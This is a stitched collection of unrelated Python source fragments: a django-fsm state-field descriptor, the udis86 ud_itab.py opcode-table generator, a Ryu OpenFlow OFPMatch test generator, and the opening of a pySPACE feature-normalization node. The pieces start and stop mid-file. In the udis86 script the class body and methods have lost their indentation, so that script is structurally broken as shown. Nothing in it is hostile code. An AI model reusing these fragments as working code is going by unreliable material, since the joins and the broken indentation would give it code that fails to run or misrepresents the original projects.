        return obj.__dict__[self.field.name]

    def __set__(self, instance, value):
        name = self.field.name
        # A protected field may be initialised once, but never directly
        # reassigned afterwards.
        if self.field.protected and name in instance.__dict__:
            raise AttributeError('Direct %s modification is not allowed' % name)
        instance.__dict__[name] = self.field.to_python(value)
class FSMField(models.Field):
    """
    State Machine support for Django model.

    Stored as a CharField; access is mediated by FSMFieldDescriptor so
    that 'protected' fields cannot be reassigned directly.
    """
    descriptor_class = FSMFieldDescriptor

    def __init__(self, *args, **kwargs):
        # protected=True forbids direct assignment after initialisation
        # (enforced by the descriptor).
        self.protected = kwargs.pop('protected', False)
        kwargs.setdefault('max_length', 50)
        super(FSMField, self).__init__(*args, **kwargs)
        # Transition methods registered against this field instance.
        self.transitions = []

    def contribute_to_class(self, cls, name):
        super(FSMField,self).contribute_to_class(cls, name)
        # Install the guarding descriptor under the field's name.
        setattr(cls, self.name, self.descriptor_class(self))
        if self.transitions:
            # Expose get_available_<name>_transitions() on the model.
            setattr(cls, 'get_available_%s_transitions' % self.name, curry(get_available_FIELD_transitions, field=self))

    def get_internal_type(self):
        # Persisted like a plain CharField.
        return 'CharField'
class FSMKeyField(models.ForeignKey):
    """
    State Machine support for Django model.

    ForeignKey-backed variant of FSMField; recognised alongside FSMField
    by FSMMeta._get_state_field when locating a model's state field.
    """
| |
# udis86 - scripts/ud_itab.py
#
# Copyright (c) 2009, 2013 Vivek Thampi
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import sys
from ud_opcode import UdOpcodeTable, UdOpcodeTables, UdInsnDef
class UdItabGenerator:
OperandDict = {
"Av" : [ "OP_A" , "SZ_V" ],
"E" : [ "OP_E" , "SZ_NA" ],
"Eb" : [ "OP_E" , "SZ_B" ],
"Ew" : [ "OP_E" , "SZ_W" ],
"Ev" : [ "OP_E" , "SZ_V" ],
"Ed" : [ "OP_E" , "SZ_D" ],
"Ey" : [ "OP_E" , "SZ_Y" ],
"Eq" : [ "OP_E" , "SZ_Q" ],
"Ez" : [ "OP_E" , "SZ_Z" ],
"Fv" : [ "OP_F" , "SZ_V" ],
"G" : [ "OP_G" , "SZ_NA" ],
"Gb" : [ "OP_G" , "SZ_B" ],
"Gw" : [ "OP_G" , "SZ_W" ],
"Gv" : [ "OP_G" , "SZ_V" ],
"Gy" : [ "OP_G" , "SZ_Y" ],
"Gd" : [ "OP_G" , "SZ_D" ],
"Gq" : [ "OP_G" , "SZ_Q" ],
"Gz" : [ "OP_G" , "SZ_Z" ],
"M" : [ "OP_M" , "SZ_NA" ],
"Mb" : [ "OP_M" , "SZ_B" ],
"Mw" : [ "OP_M" , "SZ_W" ],
"Ms" : [ "OP_M" , "SZ_W" ],
"Md" : [ "OP_M" , "SZ_D" ],
"Mq" : [ "OP_M" , "SZ_Q" ],
"Mdq" : [ "OP_M" , "SZ_DQ" ],
"Mv" : [ "OP_M" , "SZ_V" ],
"Mt" : [ "OP_M" , "SZ_T" ],
"Mo" : [ "OP_M" , "SZ_O" ],
"MbRd" : [ "OP_MR" , "SZ_BD" ],
"MbRv" : [ "OP_MR" , "SZ_BV" ],
"MwRv" : [ "OP_MR" , "SZ_WV" ],
"MwRd" : [ "OP_MR" , "SZ_WD" ],
"MwRy" : [ "OP_MR" , "SZ_WY" ],
"MdRy" : [ "OP_MR" , "SZ_DY" ],
"I1" : [ "OP_I1" , "SZ_NA" ],
"I3" : [ "OP_I3" , "SZ_NA" ],
"Ib" : [ "OP_I" , "SZ_B" ],
"Iw" : [ "OP_I" , "SZ_W" ],
"Iv" : [ "OP_I" , "SZ_V" ],
"Iz" : [ "OP_I" , "SZ_Z" ],
"sIb" : [ "OP_sI" , "SZ_B" ],
"sIz" : [ "OP_sI" , "SZ_Z" ],
"sIv" : [ "OP_sI" , "SZ_V" ],
"Jv" : [ "OP_J" , "SZ_V" ],
"Jz" : [ "OP_J" , "SZ_Z" ],
"Jb" : [ "OP_J" , "SZ_B" ],
"R" : [ "OP_R" , "SZ_RDQ" ],
"C" : [ "OP_C" , "SZ_NA" ],
"D" : [ "OP_D" , "SZ_NA" ],
"S" : [ "OP_S" , "SZ_W" ],
"Ob" : [ "OP_O" , "SZ_B" ],
"Ow" : [ "OP_O" , "SZ_W" ],
"Ov" : [ "OP_O" , "SZ_V" ],
"U" : [ "OP_U" , "SZ_O" ],
"Ux" : [ "OP_U" , "SZ_X" ],
"V" : [ "OP_V" , "SZ_DQ" ],
"Vdq" : [ "OP_V" , "SZ_DQ" ],
"Vqq" : [ "OP_V" , "SZ_QQ" ],
"Vsd" : [ "OP_V" , "SZ_Q" ],
"Vx" : [ "OP_V" , "SZ_X" ],
"H" : [ "OP_H" , "SZ_X" ],
"Hx" : [ "OP_H" , "SZ_X" ],
"Hqq" : [ "OP_H" , "SZ_QQ" ],
"W" : [ "OP_W" , "SZ_DQ" ],
"Wdq" : [ "OP_W" , "SZ_DQ" ],
"Wqq" : [ "OP_W" , "SZ_QQ" ],
"Wsd" : [ "OP_W" , "SZ_Q" ],
"Wx" : [ "OP_W" , "SZ_X" ],
"L" : [ "OP_L" , "SZ_O" ],
"Lx" : [ "OP_L" , "SZ_X" ],
"MwU" : [ "OP_MU" , "SZ_WO" ],
"MdU" : [ "OP_MU" , "SZ_DO" ],
"MqU" : [ "OP_MU" , "SZ_QO" ],
"N" : [ "OP_N" , "SZ_Q" ],
"P" : [ "OP_P" , "SZ_Q" ],
"Q" : [ "OP_Q" , "SZ_Q" ],
"AL" : [ "OP_AL" , "SZ_B" ],
"AX" : [ "OP_AX" , "SZ_W" ],
"eAX" : [ "OP_eAX" , "SZ_Z" ],
"rAX" : [ "OP_rAX" , "SZ_V" ],
"CL" : [ "OP_CL" , "SZ_B" ],
"CX" : [ "OP_CX" , "SZ_W" ],
"eCX" : [ "OP_eCX" , "SZ_Z" ],
"rCX" : [ "OP_rCX" , "SZ_V" ],
"DL" : [ "OP_DL" , "SZ_B" ],
"DX" : [ "OP_DX" , "SZ_W" ],
"eDX" : [ "OP_eDX" , "SZ_Z" ],
"rDX" : [ "OP_rDX" , "SZ_V" ],
"R0b" : [ "OP_R0" , "SZ_B" ],
"R1b" : [ "OP_R1" , "SZ_B" ],
"R2b" : [ "OP_R2" , "SZ_B" ],
"R3b" : [ "OP_R3" , "SZ_B" ],
"R4b" : [ "OP_R4" , "SZ_B" ],
"R5b" : [ "OP_R5" , "SZ_B" ],
"R6b" : [ "OP_R6" , "SZ_B" ],
"R7b" : [ "OP_R7" , "SZ_B" ],
"R0w" : [ "OP_R0" , "SZ_W" ],
"R1w" : [ "OP_R1" , "SZ_W" ],
"R2w" : [ "OP_R2" , "SZ_W" ],
"R3w" : [ "OP_R3" , "SZ_W" ],
"R4w" : [ "OP_R4" , "SZ_W" ],
"R5w" : [ "OP_R5" , "SZ_W" ],
"R6w" : [ "OP_R6" , "SZ_W" ],
"R7w" : [ "OP_R7" , "SZ_W" ],
"R0v" : [ "OP_R0" , "SZ_V" ],
"R1v" : [ "OP_R1" , "SZ_V" ],
"R2v" : [ "OP_R2" , "SZ_V" ],
"R3v" : [ "OP_R3" , "SZ_V" ],
"R4v" : [ "OP_R4" , "SZ_V" ],
"R5v" : [ "OP_R5" , "SZ_V" ],
"R6v" : [ "OP_R6" , "SZ_V" ],
"R7v" : [ "OP_R7" , "SZ_V" ],
"R0z" : [ "OP_R0" , "SZ_Z" ],
"R1z" : [ "OP_R1" , "SZ_Z" ],
"R2z" : [ "OP_R2" , "SZ_Z" ],
"R3z" : [ "OP_R3" , "SZ_Z" ],
"R4z" : [ "OP_R4" , "SZ_Z" ],
"R5z" : [ "OP_R5" , "SZ_Z" ],
"R6z" : [ "OP_R6" , "SZ_Z" ],
"R7z" : [ "OP_R7" , "SZ_Z" ],
"R0y" : [ "OP_R0" , "SZ_Y" ],
"R1y" : [ "OP_R1" , "SZ_Y" ],
"R2y" : [ "OP_R2" , "SZ_Y" ],
"R3y" : [ "OP_R3" , "SZ_Y" ],
"R4y" : [ "OP_R4" , "SZ_Y" ],
"R5y" : [ "OP_R5" , "SZ_Y" ],
"R6y" : [ "OP_R6" , "SZ_Y" ],
"R7y" : [ "OP_R7" , "SZ_Y" ],
"ES" : [ "OP_ES" , "SZ_NA" ],
"CS" : [ "OP_CS" , "SZ_NA" ],
"DS" : [ "OP_DS" , "SZ_NA" ],
"SS" : [ "OP_SS" , "SZ_NA" ],
"GS" : [ "OP_GS" , "SZ_NA" ],
"FS" : [ "OP_FS" , "SZ_NA" ],
"ST0" : [ "OP_ST0" , "SZ_NA" ],
"ST1" : [ "OP_ST1" , "SZ_NA" ],
"ST2" : [ "OP_ST2" , "SZ_NA" ],
"ST3" : [ "OP_ST3" , "SZ_NA" ],
"ST4" : [ "OP_ST4" , "SZ_NA" ],
"ST5" : [ "OP_ST5" , "SZ_NA" ],
"ST6" : [ "OP_ST6" , "SZ_NA" ],
"ST7" : [ "OP_ST7" , "SZ_NA" ],
"NONE" : [ "OP_NONE" , "SZ_NA" ],
}
#
# opcode prefix dictionary
#
PrefixDict = {
"rep" : "P_str",
"repz" : "P_strz",
"aso" : "P_aso",
"oso" : "P_oso",
"rexw" : "P_rexw",
"rexb" : "P_rexb",
"rexx" : "P_rexx",
"rexr" : "P_rexr",
"vexl" : "P_vexl",
"vexw" : "P_vexw",
"seg" : "P_seg",
"inv64" : "P_inv64",
"def64" : "P_def64",
"cast" : "P_cast",
}
MnemonicAliases = ( "invalid", "3dnow", "none", "db", "pause" )
def __init__(self, tables):
    """Index every instruction and table of *tables* for C emission.

    The maps assign each instruction / table the position it will
    occupy in the generated ud_itab[] / table list arrays.
    """
    self.tables = tables
    self._insnIndexMap = {
        insn: idx for idx, insn in enumerate(tables.getInsnList())}
    self._tableIndexMap = {
        tbl: idx for idx, tbl in enumerate(tables.getTableList())}
def getInsnIndex(self, insn):
    """Return the index of *insn* within the emitted ud_itab[] array."""
    assert isinstance(insn, UdInsnDef)
    return self._insnIndexMap[insn]
def getTableIndex(self, table):
    """Return the index of *table* within the emitted table list."""
    assert isinstance(table, UdOpcodeTable)
    return self._tableIndexMap[table]
def getTableName(self, table):
    """Return the C identifier used for *table*'s opcode array."""
    index = self.getTableIndex(table)
    return "ud_itab__%d" % index
def genOpcodeTable(self, table, isGlobal=False):
    """Emit one opcode lookup table as a C uint16_t array.

    Entries are written four per row.  Empty slots become INVALID,
    sub-tables become GROUP(table-index) and instruction definitions
    their ud_itab[] index.  Non-root tables get internal linkage.
    """
    out = self.ItabC
    out.write("\n")
    if not isGlobal:
        out.write('static ')
    out.write("const uint16_t %s[] = {\n" % self.getTableName(table))
    for slot in range(table.size()):
        if slot % 4 == 0:
            # start a new row, labelled with the slot offset in hex
            if slot > 0:
                out.write("\n")
            out.write(" /* %2x */" % slot)
        entry = table.entryAt(slot)
        if entry is None:
            out.write("%12s," % "INVALID")
        elif isinstance(entry, UdOpcodeTable):
            out.write("%12s," % ("GROUP(%d)" % self.getTableIndex(entry)))
        elif isinstance(entry, UdInsnDef):
            out.write("%12s," % self.getInsnIndex(entry))
    out.write("\n")
    out.write("};\n")
def genOpcodeTables(self):
    """Emit every opcode table; only the root table gets external linkage."""
    root = self.tables.root
    for table in self.tables.getTableList():
        self.genOpcodeTable(table, table is root)
def genOpcodeTablesLookupIndex(self):
    """Emit ud_lookup_table_list[]: one {array, label, meta} row per table."""
    out = self.ItabC
    out.write("\n\n")
    out.write("struct ud_lookup_table_list_entry ud_lookup_table_list[] = {\n")
    for table in self.tables.getTableList():
        out.write(" /* %03d */ { %s, %s, \"%s\" },\n"
                  % (self.getTableIndex(table),
                     self.getTableName(table),
                     table.label(),
                     table.meta()))
    out.write("};")
def genInsnTable(self):
    """Emit ud_itab[]: one {mnemonic, operands, prefixes} row per insn.

    Unknown operand or prefix names are reported on stdout; an unknown
    prefix subsequently raises KeyError on the dictionary lookup.
    """
    self.ItabC.write("struct ud_itab_entry ud_itab[] = {\n")
    for insn in self.tables.getInsnList():
        # up to four operands, padded with O_NONE
        opr_c = ["O_NONE", "O_NONE", "O_NONE", "O_NONE"]
        for i, operand in enumerate(insn.operands):
            if operand not in self.OperandDict:
                print("error: invalid operand declaration: %s\n" % operand)
            opr_c[i] = "O_" + operand
        opr = "%s %s %s %s" % (opr_c[0] + ",", opr_c[1] + ",",
                               opr_c[2] + ",", opr_c[3])
        pfx_c = []
        for p in insn.prefixes:
            if p not in self.PrefixDict:
                # bug fix: the error message previously interpolated the
                # not-yet-bound name 'pfx' and raised NameError instead
                # of reporting the offending prefix.
                print("error: invalid prefix specification: %s \n" % p)
            pfx_c.append(self.PrefixDict[p])
        if len(insn.prefixes) == 0:
            pfx_c.append("P_none")
        pfx = "|".join(pfx_c)
        self.ItabC.write(" /* %04d */ { UD_I%s %s, %s },\n"
                         % (self.getInsnIndex(insn), insn.mnemonic + ',',
                            opr, pfx))
    self.ItabC.write("};\n")
def getMnemonicsList(self):
    """Return table mnemonics followed by the hard-coded aliases."""
    names = self.tables.getMnemonicsList()
    names.extend(self.MnemonicAliases)
    return names
def genMnemonicsList(self):
    """Emit ud_mnemonics_str[], one quoted string per mnemonic."""
    quoted = ["\"%s\"" % name for name in self.getMnemonicsList()]
    self.ItabC.write("\n\n")
    self.ItabC.write("const char* ud_mnemonics_str[] = {\n ")
    self.ItabC.write(",\n ".join(quoted))
    self.ItabC.write("\n};\n")
def genItabH( self, filePath ):
    """Generate itab.h: the table-type enum, the mnemonic enum and the
    extern declaration of ud_mnemonics_str, under an UD_ITAB_H guard."""
    self.ItabH = open( filePath, "w" )
    # Generate Table Type Enumeration
    self.ItabH.write( "#ifndef UD_ITAB_H\n" )
    self.ItabH.write( "#define UD_ITAB_H\n\n" )
    self.ItabH.write("/* itab.h -- generated by udis86:scripts/ud_itab.py, do no edit */\n\n")
    # table type enumeration
    self.ItabH.write( "/* ud_table_type -- lookup table types (see decode.c) */\n" )
    self.ItabH.write( "enum ud_table_type {\n " )
    enum = UdOpcodeTable.getLabels()
    self.ItabH.write( ",\n ".join( enum ) )
    self.ItabH.write( "\n};\n\n" );
    # mnemonic enumeration
    self.ItabH.write( "/* ud_mnemonic -- mnemonic constants */\n" )
    enum = "enum ud_mnemonic_code {\n "
    enum += ",\n ".join( [ "UD_I%s" % m for m in self.getMnemonicsList() ] )
    # sentinel giving the number of mnemonic codes
    enum += ",\n UD_MAX_MNEMONIC_CODE"
    enum += "\n} UD_ATTR_PACKED;\n"
    self.ItabH.write( enum )
    self.ItabH.write( "\n" )
    self.ItabH.write( "extern const char * ud_mnemonics_str[];\n" )
    self.ItabH.write( "\n#endif /* UD_ITAB_H */\n" )
    self.ItabH.close()
def genItabC(self, filePath):
    """Generate itab.c: opcode tables, lookup index, operand short-name
    macros, the instruction table and the mnemonic string list.

    The emission order matters: the INVALID macro must precede the
    opcode tables that reference it.
    """
    self.ItabC = open(filePath, "w")
    self.ItabC.write("/* itab.c -- generated by udis86:scripts/ud_itab.py, do no edit")
    self.ItabC.write(" */\n");
    self.ItabC.write("#include \"decode.h\"\n\n");
    # GROUP(n) tags a table slot as a reference to sub-table n
    self.ItabC.write("#define GROUP(n) (0x8000 | (n))\n")
    self.ItabC.write("#define INVALID %d\n\n" % self.getInsnIndex(self.tables.invalidInsn))
    self.genOpcodeTables()
    self.genOpcodeTablesLookupIndex()
    #
    # Macros defining short-names for operands
    #
    self.ItabC.write("\n\n/* itab entry operand definitions (for readability) */\n");
    operands = self.OperandDict.keys()
    operands = sorted(operands)
    for o in operands:
        self.ItabC.write("#define O_%-7s { %-12s %-8s }\n" %
            (o, self.OperandDict[o][0] + ",", self.OperandDict[o][1]));
    self.ItabC.write("\n");
    self.genInsnTable()
    self.genMnemonicsList()
    self.ItabC.close()
def genItab(self, location):
    """Write itab.c and itab.h into the directory *location*."""
    for file_name, emit in (("itab.c", self.genItabC),
                            ("itab.h", self.genItabH)):
        emit(os.path.join(location, file_name))
def usage():
    """Print command-line usage for the itab generator script."""
    print("usage: ud_itab.py <optable.xml> <output-path>")
def main():
    """Script entry point: parse the optable XML and emit itab.c/itab.h."""
    if len(sys.argv) != 3:
        usage()
        sys.exit(1)
    xml_path, out_dir = sys.argv[1], sys.argv[2]
    generator = UdItabGenerator(UdOpcodeTables(xml=xml_path))
    generator.genItab(out_dir)

if __name__ == '__main__':
    main()
| |
# Copyright (C) 2013 Nippon Telegraph and Telephone Corporation.
# Copyright (C) 2013 YAMAMOTO Takashi <yamamoto at valinux co jp>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
    # Python 3: reduce is no longer a builtin; import it from functools
    from functools import reduce
except ImportError:
    # Python 2: reduce is available as a builtin, nothing to do
    pass
import sys
import unittest
from nose.tools import eq_
from nose.tools import ok_
from ryu.ofproto import ofproto_v1_2
from ryu.ofproto import ofproto_v1_3
from ryu.ofproto import ofproto_v1_2_parser
from ryu.ofproto import ofproto_v1_3_parser
from ryu.tests import test_lib
class Test_Parser_OFPMatch(unittest.TestCase):
    """Round-trip serialize/parse checks for OFPMatch (OF1.2 and OF1.3)."""

    # parser module -> matching protocol-constants module
    _ofp = {ofproto_v1_2_parser: ofproto_v1_2,
            ofproto_v1_3_parser: ofproto_v1_3}

    def __init__(self, methodName):
        print('init %s' % methodName)
        super(Test_Parser_OFPMatch, self).__init__(methodName)

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def _test(self, name, ofpp, d, domask):
        if domask:
            # normalize (value, mask) pairs the same way the user API does
            ofp = self._ofp[ofpp]
            d = dict(ofp.oxm_normalize_user(field, user_value)
                     for (field, user_value) in d.iteritems())
        match = ofpp.OFPMatch(**d)
        buf = bytearray()
        match.serialize(buf, 0)
        parsed = match.parser(buffer(buf), 0)
        # every requested field must survive the round trip unchanged
        for field, value in d.iteritems():
            ok_(field in match)
            ok_(field in parsed)
            eq_(match[field], value)
            eq_(parsed[field], value)
        # neither match object may carry fields that were not requested
        for m in (match, parsed):
            for field, value in m.iteritems():
                ok_(field in d)
                eq_(d[field], value)
def _add_tests():
    """Synthesize and register test methods on Test_Parser_OFPMatch.

    For each parser module, each 1- or 2-field combination of match
    fields, each generated field value and both masked/unmasked modes,
    one test method is created and attached via test_lib.add_method.
    """
    import functools
    import itertools

    # Value generators per field type; generate_mask() reuses the second
    # generated value as the mask operand.
    class Field(object):
        @classmethod
        def generate_mask(cls):
            return list(cls.generate())[1]

    class Int1(Field):
        @staticmethod
        def generate():
            yield 0
            yield 0xff

    class Int2(Field):
        @staticmethod
        def generate():
            yield 0
            yield 0x1234
            yield 0xffff

    class Int3(Field):
        @staticmethod
        def generate():
            yield 0
            yield 0x123456
            yield 0xffffff

    class Int4(Field):
        @staticmethod
        def generate():
            yield 0
            yield 0x12345678
            yield 0xffffffff

    class Int8(Field):
        @staticmethod
        def generate():
            yield 0
            yield 0x123456789abcdef0
            yield 0xffffffffffffffff

    class Mac(Field):
        @staticmethod
        def generate():
            yield '00:00:00:00:00:00'
            yield 'f2:0b:a4:7d:f8:ea'
            yield 'ff:ff:ff:ff:ff:ff'

    class IPv4(Field):
        @staticmethod
        def generate():
            yield '0.0.0.0'
            yield '192.0.2.1'
            yield '255.255.255.255'

    class IPv6(Field):
        @staticmethod
        def generate():
            yield '::'
            yield 'fe80::f00b:a4ff:fed0:3f70'
            yield 'ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff'

    class B64(Field):
        @staticmethod
        def generate():
            yield 'aG9nZWhvZ2U='
            yield 'ZnVnYWZ1Z2E='

    ofpps = [ofproto_v1_2_parser, ofproto_v1_3_parser]
    # fields available in both OF1.2 and OF1.3
    common = [
        ('in_port', Int4),
        ('in_phy_port', Int4),
        ('metadata', Int8),
        ('eth_dst', Mac),
        ('eth_src', Mac),
        ('eth_type', Int2),
        ('vlan_vid', Int2),
        ('vlan_pcp', Int1),
        ('ip_dscp', Int1),
        ('ip_ecn', Int1),
        ('ip_proto', Int1),
        ('ipv4_src', IPv4),
        ('ipv4_dst', IPv4),
        ('tcp_src', Int2),
        ('tcp_dst', Int2),
        ('udp_src', Int2),
        ('udp_dst', Int2),
        ('sctp_src', Int2),
        ('sctp_dst', Int2),
        ('icmpv4_type', Int1),
        ('icmpv4_code', Int1),
        ('arp_op', Int2),
        ('arp_spa', IPv4),
        ('arp_tpa', IPv4),
        ('arp_sha', Mac),
        ('arp_tha', Mac),
        ('ipv6_dst', IPv6),
        ('ipv6_src', IPv6),
        ('ipv6_flabel', Int3),
        ('icmpv6_type', Int1),
        ('icmpv6_code', Int1),
        ('ipv6_nd_target', IPv6),
        ('ipv6_nd_sll', Mac),
        ('ipv6_nd_tll', Mac),
        ('mpls_label', Int3),
        ('mpls_tc', Int1),
        ('field_100', B64),
    ]
    L = {}
    L[ofproto_v1_2_parser] = common + [
        # OF1.2 doesn't have OXM_OF_PBB_ISID.
        # OFPXMC_OPENFLOW_BASIC = 0x8000
        # OXM_OF_PBB_ISID = 37
        # (OFPXMC_OPENFLOW_BASIC << 7) + OXM_OF_PBB_ISID == 4194341
        ('field_4194341', B64),
    ]
    L[ofproto_v1_3_parser] = common + [
        ('pbb_isid', Int3),
        ('tunnel_id', Int8),
        ('ipv6_exthdr', Int2),
    ]

    # flatten the nested 2-tuples produced by chained itertools.product
    def flatten_one(l, i):
        if isinstance(i, tuple):
            return l + flatten(i)
        else:
            return l + [i]
    flatten = lambda l: reduce(flatten_one, l, [])

    for ofpp in ofpps:
        for n in range(1, 3):
            for C in itertools.combinations(L[ofpp], n):
                l = [1]
                keys = []
                clss = []
                for (k, cls) in C:
                    l = itertools.product(l, cls.generate())
                    keys.append(k)
                    clss.append(cls)
                # NOTE(review): relies on Python 2's list-returning map —
                # the result is iterated once per domask value below; a
                # Python 3 map iterator would be exhausted after the
                # first pass.  Confirm before porting.
                l = map(lambda x: flatten(x)[1:], l)
                for domask in [True, False]:
                    for values in l:
                        if domask:
                            values = [(value, cls.generate_mask())
                                      for (cls, value)
                                      in zip(clss, values)]
                        d = dict(zip(keys, values))
                        mod = ofpp.__name__.split('.')[-1]
                        method_name = 'test_' + mod
                        if domask:
                            method_name += '_mask'
                        for k in sorted(dict(d).keys()):
                            method_name += '_' + str(k)
                            method_name += '_' + str(d[k])
                        # sanitize the generated name into a valid identifier
                        method_name = method_name.replace(':', '_')
                        method_name = method_name.replace('.', '_')
                        method_name = method_name.replace('(', '_')
                        method_name = method_name.replace(')', '_')
                        method_name = method_name.replace(',', '_')
                        method_name = method_name.replace("'", '_')
                        method_name = method_name.replace(' ', '_')

                        def _run(self, name, ofpp, d, domask):
                            print('processing %s ...' % name)
                            self._test(name, ofpp, d, domask)
                        print('adding %s ...' % method_name)
                        # partial() binds the loop variables now,
                        # avoiding the late-binding closure pitfall
                        f = functools.partial(_run, name=method_name,
                                              ofpp=ofpp, d=d, domask=domask)
                        test_lib.add_method(Test_Parser_OFPMatch,
                                            method_name, f)

_add_tests()
| |
""" Normalize :class:`~pySPACE.resources.data_types.feature_vector.FeatureVector`
"""
import os
import cPickle
import scipy.stats
import numpy
from collections import defaultdict
from pySPACE.missions.nodes.base_node import BaseNode
from pySPACE.resources.data_types.feature_vector import FeatureVector
from pySPACE.tools.filesystem import create_directory
from pySPACE.missions.nodes.decorators import UniformParameter, \
BooleanParameter, ChoiceParameter
class InconsistentFeatureVectorsException(Exception):
    """ Raised when two processed FeatureVectors carry different feature sets """
    pass
class FeatureNormalizationNode(BaseNode):
    """ General node for Feature Normalization

    The node shifts the data with the *translation* variable and
    afterwards scales it with the *mult* variable.
    This transformation can be loaded and stored
    and given to visualization tools.

    When used as a standalone node, loading a transformation is mandatory
    because the *translation* and *mult* variables are otherwise not
    available.

    **Parameter**

    :load_path:
        An absolute path from which the normalization vectors are loaded.
        If not specified, these vectors are learned from the training data.

        (*optional, default: None*)

    **Exemplary Call**

    .. code-block:: yaml

        -
            node : FeatureNormalizationNode
            parameters :
                load_path: "/Users/mustermann/proj/examples/FN.pickle"

    .. warning:: This base node only works alone, when load_path is specified.

    :input: FeatureVector
    :output: FeatureVector
    :Author: Mario Krell (mario.krell@dfki.de)
    :Created: 2012/03/28
    """
    def __init__(self, load_path=None, **kwargs):
        self.load_path = load_path
        super(FeatureNormalizationNode, self).__init__(**kwargs)
        self.set_permanent_attributes(samples=[], feature_names=[],
                                      load_path=load_path,
                                      feature_indices=None,
                                      tolerance=10 ** -9)

    def is_trainable(self):
        # Training is only required when no stored transformation is given.
        # (fix: identity comparison instead of '== None')
        return self.load_path is None

    def get_own_transformation(self, sample=None):
        """ Return (scaling, offset, feature names, transformation type) """
        return (self.mult, -self.translation * self.mult,
                self.feature_names, "feature normalization")

    def store_state(self, result_dir, index=None):
        """ Stores transformation and feature names in the given directory *result_dir* """
        if self.store:
            node_dir = os.path.join(result_dir, self.__class__.__name__)
            create_directory(node_dir)
            name = "%s_sp%s.pickle" % ("FN", self.current_split)
            result_file = open(os.path.join(node_dir, name), "wb")
            result_file.write(cPickle.dumps((self.translation,
                                             self.mult,
                                             self.feature_names), protocol=2))
            result_file.close()
        super(FeatureNormalizationNode, self).store_state(result_dir)

    def _train(self, data):
        """ Collects the values each feature takes on in the training set. """
        # Check that feature vectors are compatible
        self.extract_feature_names(data)
        data_array = data.view(numpy.ndarray)
        self.collect_data(data_array)

    def extract_feature_names(self, data):
        """ Remember the feature names on first call, check consistency after

        :raises: InconsistentFeatureVectorsException if *data* carries a
                 different feature set than previously seen.
        """
        if self.feature_names == []:
            self.feature_names = data.feature_names
            self.dim = len(self.feature_names)
        elif type(self.feature_names != data.feature_names) is bool:
            # plain list comparison yields a single bool
            if self.feature_names != data.feature_names:
                raise InconsistentFeatureVectorsException(
                    "Two feature vectors do not contain the same features!")
        elif (self.feature_names != data.feature_names).all():
            # numpy array comparison yields an element-wise boolean array
            raise InconsistentFeatureVectorsException(
                "Two feature vectors do not contain the same features!")

    def _execute(self, data):
        """ Normalizes the feature vector data.

        Normalizes the feature vector data by subtracting
        the *translation* variable and scaling it with *mult*.

        .. todo:: check if problems in data transformation still occur
        """
        if not (self.load_path is None or self.load_path == "already_loaded"):
            # lazily load a stored transformation exactly once
            self.replace_keywords_in_load_path()
            # fix: open in binary mode ('rb') — the pickle is written with
            # "wb" and protocol 2; text mode corrupts it on some platforms
            load_file = open(self.load_path, 'rb')
            self.translation, self.mult, self.feature_names = \
                cPickle.load(load_file)
            # fix: close the file handle (was leaked)
            load_file.close()
            self.load_path = "already_loaded"
        self.extract_feature_names(data)
        # mapping of feature names if current features are a subset
        # of loaded feature normalization in the training
        if self.feature_indices is None:
            try:
                if type(self.feature_names) is numpy.ndarray:
                    self.feature_names = self.feature_names.tolist()
                self.feature_indices = [
                    self.feature_names.index(feature_name)
                    for feature_name in data.feature_names]
            except ValueError:
                raise InconsistentFeatureVectorsException(
                    "Cannot normalize a feature vector "
                    "with an unknown feature dimension!")
        # The data reference is not changed or deleted but here it is
        # temporarily replaced.
        if self.translation is not None:
            data = (data - self.translation[self.feature_indices]) \
                * self.mult[self.feature_indices]
        else:
            data = data * 0
        # Handle cases where lower and upper bound are identical
        # This is for example the case, when one feature generating
        # measurement device is off or out of order
        data[numpy.isnan(data)] = 0.0
        data[numpy.isinf(data)] = 0.0
        return FeatureVector(data,
                             data.feature_names)

    def collect_data(self, data):
        """ Remember the sample for use in _stop_training of subclasses """
        self.samples.append(numpy.array(data[0, :]))
@UniformParameter("outlier_percentage", min_value=0, max_value=100)
class OutlierFeatureNormalizationNode(FeatureNormalizationNode):
    """ Map the feature vectors of the training set to the range [0,1]^n

    Each feature dimension is normalized so that a learned upper boundary
    maps to 1 and a learned lower boundary to 0; values in between are
    linearly interpolated.  An *outlier_percentage* ratio of the training
    data may fall outside these boundaries (half above, half below).

    **Parameters**

    :outlier_percentage:
        The percentage of training instances that are potential outliers.

        (*optional, default: 0*)

    **Exemplary Call**

    .. code-block:: yaml

        -
            node : OutlierFeatureNormalization
            parameters :
                outlier_percentage : 10

    :Author: Jan Hendrik Metzen (jhm@informatik.uni-bremen.de)
    :Created: ??
    :Revised (1): 2009/07/16
    :Revised (2): 2009/09/03
